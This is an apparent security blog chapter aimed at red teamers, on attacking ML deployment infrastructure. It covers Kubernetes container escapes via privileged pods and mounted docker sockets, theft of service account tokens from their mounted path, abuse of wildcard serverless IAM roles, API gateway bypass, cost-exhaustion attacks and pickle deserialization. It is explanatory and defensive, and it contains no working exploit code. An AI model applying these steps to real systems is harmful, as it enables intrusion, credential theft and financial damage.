10.3.3 Deployment infrastructure attacks

2025.10.06.
AI Security Blog

Once a model survives the CI/CD pipeline and is pulled from a registry, it enters its operational environment. This deployment infrastructure—whether a sprawling Kubernetes cluster, a lean serverless function, or a dedicated virtual machine—becomes the new frontline. Attacking this layer isn’t about tricking the model’s logic; it’s about dismantling the foundation it stands on, gaining control of its execution, and exploiting the trust placed in its operational context.

Your goal as a red teamer is to treat the deployed model not as the target itself, but as a potential foothold into the production environment. A compromised inference endpoint can become a pivot point to exfiltrate data, poison other systems, or disrupt the entire MLOps lifecycle.

Kapcsolati űrlap - EN

Do you have a question about AI Security? Reach out to us here:

Compromising Containerized ML Environments

Kubernetes has become the de facto standard for orchestrating ML workloads, but its complexity creates a rich attack surface. A single misconfiguration in a pod definition or a network policy can unravel the security of the entire cluster.

Privilege Escalation via Insecure Pod Configurations

Developers often grant excessive permissions to pods for debugging or simplicity, creating dangerous backdoors. Look for pods running with `privileged: true` or with sensitive host volumes mounted using `hostPath`. A compromised inference container with a `hostPath` mount to `/` or `/var/run/docker.sock` effectively gives you root on the underlying node.

A common attack vector involves finding a remote code execution (RCE) vulnerability in the model’s serving framework (like Flask or FastAPI) and then using the pod’s overprivileged configuration to escape the container.

Kubernetes Pivot Attack from Compromised Inference Pod Kubernetes Cluster Attacker Inference Pod (Vulnerable API) hostPath: /var/run/docker.sock Service Account Token Worker Node Kubelet Docker Socket Other Pods 1 RCE via API 2 Escape via Docker Socket 3 Steal Credentials

Service Account Token Theft and Abuse

Every Kubernetes pod is associated with a service account, and its token is automatically mounted inside the container at `/var/run/secrets/kubernetes.io/serviceaccount/token`. If this service account has excessive permissions (e.g., `cluster-admin` or the ability to list secrets in all namespaces), an attacker who gains RCE in the pod can use this token with `kubectl` or the K8s API to pivot and compromise the entire cluster. Always check the permissions bound to the service account of your inference pods.

Exploiting Serverless Deployment Flaws

Serverless functions (e.g., AWS Lambda, Google Cloud Functions) offer a seemingly secure, ephemeral environment. However, their security hinges entirely on the Identity and Access Management (IAM) roles they assume. A single overly permissive role can be a critical vulnerability.

Your primary target is the execution role. If an attacker can find a way to execute code within the function—perhaps through a dependency confusion vulnerability in a function layer or by exploiting a library used for data preprocessing—they inherit all permissions of that role.

# Example of a dangerously permissive serverless.yml for an AWS Lambda function
provider:
  name: aws
  runtime: python3.9
  iam:
    role:
      statements:
        - Effect: "Allow"
          # BAD: Wildcard permissions grant access to all S3 buckets
          Action: "s3:*" 
          Resource: "arn:aws:s3:::*" # Attacker can now read training data, other models, etc.
        - Effect: "Allow"
          # BAD: Grants access to read all secrets in Secrets Manager
          Action: "secretsmanager:GetSecretValue"
          Resource: "*" # Attacker can exfiltrate API keys, DB credentials

functions:
  predict:
    handler: handler.predict
    # ... function configuration
                

In the example above, a compromise of the `predict` function allows the attacker to read from any S3 bucket and retrieve any secret within the AWS account. This could include raw training data, other production models, or credentials for entirely different systems, turning a model compromise into a full-scale cloud environment breach.

Subverting API Gateways and Model Endpoints

The API gateway is the public-facing door to your model. Attackers will probe it for weaknesses in authentication, authorization, and resource management before even attempting to interact with the model itself.

Authentication and Authorization Bypass

Test for classic web security flaws. Can you access an endpoint without a valid API key? Can a user-level key access administrative functions? Look for misconfigured routing rules where a path like `/v1/predict/internal` might bypass authentication checks applied only to `/v1/predict`.

Economic Denial of Service (EDoS) via Resource Exhaustion

ML inference can be computationally expensive. If the API gateway has weak or non-existent rate limiting, you can launch an EDoS attack. By sending a high volume of legitimate inference requests, you can drive up cloud computing costs astronomically without ever triggering traditional DoS protections. This is especially effective against models that run on expensive GPU instances. Your test is simple: script a loop to call the endpoint and observe the billing dashboard.

Red Team TTPs for Infrastructure Validation

Systematically testing the deployment infrastructure requires a combination of cloud configuration review and active exploitation. The following table outlines key tactics.

Target Component Common Vulnerability Red Team Tactic Impact on ML System
Kubernetes Pod Privileged container or sensitive hostPath mount Gain RCE in the container, then use mounted sockets or host access to escape to the node. Full control over the inference node; ability to intercept/modify model inputs/outputs for all pods on the node.
Kubernetes Service Account Overly permissive RBAC role binding Steal the service account token from within a compromised pod. Use `kubectl` with the token to enumerate and access cluster resources. Exfiltrate other models, training data secrets, or deploy malicious pods into the cluster.
Serverless Function Wildcard IAM permissions (e.g., `s3:*`) Exploit a code injection or dependency flaw to run AWS CLI commands using the function’s assumed role. Exfiltrate the entire training dataset, steal the model artifact file, or access other sensitive cloud resources.
API Gateway Missing or misconfigured rate limiting Automate a high volume of valid requests to the inference endpoint. Cause massive cost overruns (Economic DoS); degrade service performance for legitimate users.
Model Serving Framework Insecure deserialization (e.g., Pickle) Craft a malicious input file that, when deserialized by the model loader, executes arbitrary code. Achieve initial code execution within the container/VM, initiating a broader infrastructure attack.